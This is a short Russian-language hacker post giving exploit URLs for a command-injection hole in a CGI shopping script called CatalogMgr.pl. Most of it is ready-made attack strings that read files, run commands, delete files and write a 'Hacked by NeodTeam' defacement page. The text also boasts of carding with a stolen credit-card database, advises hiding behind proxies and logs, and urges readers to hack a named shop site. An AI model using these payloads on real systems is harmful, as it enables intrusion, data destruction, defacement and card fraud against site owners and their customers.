Привет, перцы. Сегодня решил я рассказать
вам о дыре, которая называется CatalogMgr.pl
Exploit:
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;команда|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=файл
Итак, что же дает нам эта уязвимость? Как
ты уже догадался, мы можем смотреть все
файлы и директории на диске. Но, помимо
этого, мы можем выполнять некоторые команды.
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;echo "string" >> file_name|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;who|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;id|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;cp 1file 2file|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;rm file_name|
Теперь, когда ты уже нашел базу сс и
накардил себе сотовый, холодильник, машину,
дом, дачу можно приступить к завершающей
части - дефейсу. Можно, конечно, получить
логин с паролем, закачать своим скриптом
файло, но на этом останавливаться не будем.
Что если ftp закрыт? Придется писать html на
месте. Все бы хорошо, но в твоем коде нельзя
использовать знак "="... Поэтому можно
сделать только текстовый дефейс, а это
ламерство. Тут к нам на помощь приходят
стили. Что же можно сделать? Стиль будет
выглядеть примерно так:
<style>BODY{background-image: url(http://www.neod.f2s.com/hacked.gif);background-repeat:
no-repeat;}</style>
Теперь нам остается набрать в браузере
строку:
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;echo "<html><head><title>Hacked by
NeodTeam</title> <style>BODY{background-image: url(http://www.myserver.com/hacked.gif);
background-repeat:no-repeat;}</style></head> <body></body><html>"
> default.htm|
Вот и все !!! (Не забывайте о прокси и логах)
P.S Для примера можете хакнуть www.inetshopping.com
